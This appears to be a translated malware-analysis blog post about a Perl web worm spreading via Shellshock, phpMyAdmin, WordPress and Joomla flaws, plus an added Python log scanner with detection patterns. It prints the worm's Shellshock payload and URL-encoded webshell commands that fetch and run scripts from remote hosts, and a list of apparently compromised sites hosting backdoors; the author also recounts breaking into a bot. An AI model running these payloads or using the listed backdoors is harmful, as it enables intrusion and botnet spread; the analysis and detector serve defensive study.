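Recently, a novel and powerful web worm was captured; functionally it amounts to a comprehensive vulnerability scanner. The worm spreads mainly by exploiting high-severity vulnerabilities in web applications, including well-known web apps such as phpMyAdmin, WordPress, Joomla and Magento, and it also uses Shellshock, weak SSH passwords, SQL injection and automated privilege escalation.
Once infected, a bot receives instructions from the server to carry out DDoS attacks, scan for vulnerabilities and infect other hosts, act as an HTTP proxy, spawn an IRC server, and so on. Analysis found that, among the hosts already infected, the number of websites serving as web proxies has reached 1000. Later I will share all the source code involved (including the notorious phpMyAdmin worm ZmEu).
0x01 How it started
While going through my VPS web logs I saw signs of attack: the ZmEu user agent and Shellshock payloads.
I then followed the trail and got a shell on one bot (I used a WordPress vulnerability to download the database configuration file and logged in to WordPress with the database password, but I had no permission to install plugins, so in the post editor I inserted PHP code that the insertPHP plugin parses; everything was in Korean and it took more than an hour of fiddling).
In the website directory I found a very capable PHP webshell that supports bypassing safe mode, installing a proxy and so on, so I decided to dig deeper.
In some of the source code downloaded from this bot I found an alarming C&C program.
0x02 Analysis
The Perl script portion of this worm alone already exceeds ten thousand lines, so please point out anything I have analysed incorrectly. Once a bot node finds that a server is vulnerable, it downloads the control script onto that vulnerable host and executes it, and the host becomes a bot; finally an e-mail is sent to the controller to register the controlled host. For example, the Shellshock payload: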
"() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";
system(\"wget http://xxxserver.com/shell.txt -O /tmp/shell.txt;curl -O /tmp/shell.txt http:// xxxserver.com/shell.txt;
perl /tmp/shell.txt ; rm -rf shell.txt \");'"
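We will use infection through web vulnerabilities as the main thread for analysing the flow. For brevity I will omit some of the code.
Initialising the remote download server addresses: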
my $rceinjector = "http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/error.php";
my $rceinjector2 = "http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/xml.php";
#my $arbitrary = "http://www.handelwpolsce.pl/images/Sport/rce.php";
#my $hostinjector = "wordpress.com.longlifeweld.com.my";
my $thumbid = "http://".$hostinjector."/petx.php";
my $thumbidx = "http://".$hostinjector."/cpx.php";
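The Linux download commands are passed through a web parameter: after a bot successfully exploits a vulnerability and gets a shell, it sends these commands, which download the controlled-side scripts, to the webshell.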
my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;wget%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;wget%20http%3A%2F%2F".$hostinjector."%2Fmagic1.php";
my $lwpdon = "?cmd=lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fcpx.php";
my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fcpx.php";
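The three traces the article describes (the ZmEu user agent, the Shellshock function-definition prefix, and a `?cmd=` parameter carrying a URL-encoded wget, curl or lwp-download command) can be searched for in an access log. The following is an added example and is not part of the original article or of the worm's code; the log lines, IP addresses and tag names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Signatures derived from the article's description (patterns are this example's own).
SHELLSHOCK = re.compile(r"\(\)\s*\{[^}]*\}\s*;")   # "() { :;};" function prefix
ZMEU = re.compile(r"zmeu", re.I)                    # ZmEu scanner user agent
DOWNLOADER = re.compile(r"[?&]cmd=[^&]*?\b(wget|curl|lwp-download)\b", re.I)
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request target in the log line

# Constructed sample lines in combined log format; the last one is benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2015:13:55:36 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 209 "-" "ZmEu"',
    '198.51.100.7 - - [10/Oct/2015:13:56:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { :;}; echo probe"',
    '192.0.2.9 - - [10/Oct/2015:13:57:12 +0000] "GET /wp-content/x.php?cmd=wget%20http%3A%2F%2Fexample.invalid%2Fmagic.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Oct/2015:13:58:40 +0000] "GET /tools?cmd=list HTTP/1.1" 200 512 "-" "curl/7.88.1"',
]

def classify(line):
    """Return the set of signature tags that match one log line."""
    tags = set()
    if ZMEU.search(line):
        tags.add("zmeu")
    # Shellshock can arrive in any header, so check the whole line, raw and decoded.
    if SHELLSHOCK.search(line) or SHELLSHOCK.search(unquote(line)):
        tags.add("shellshock")
    # Only the request target is checked for cmd= downloaders, so a benign
    # request sent with a curl user agent does not match.
    m = REQUEST.search(line)
    if m and DOWNLOADER.search(unquote(m.group(1))):
        tags.add("cmd-downloader")
    return tags

def scan(lines):
    """Map each client IP to the sorted list of tags seen in its requests."""
    hits = {}
    for line in lines:
        tags = classify(line)
        if tags:
            hits.setdefault(line.split(" ", 1)[0], set()).update(tags)
    return {ip: sorted(t) for ip, t in hits.items()}

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG).items():
        print(ip, ",".join(tags))
```

A `cmd-downloader` hit that was answered with status 200 deserves priority, since it suggests a webshell already exists at that path.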
Initialising 1000 web proxy backdoor addresses, in preparation for the bulk harvesting later:
my @randombarner= ("http://www.lesyro.cz/administrator/components/com_media/helpers/errors.php",
"http://www.villaholidaycentre.co.uk/includes/js/calendar/lang/seka.php",
"http://viewwebinars.com/wp-includes/errors.php",
"http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php",
"http://www.linuxcompany.nl/modules/mod_login/error.php",
"http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php",
"http://liftoffconsulting.ca/wp-includes/errors.php",
"http://www.voileenligne.com/audio/komo.php",
"http://www.gingerteastudio.com//wp-content/uploads/components/search.php",
"www.audiovisionglobal.pe/online/includes/js/calendar/lang/search.php",
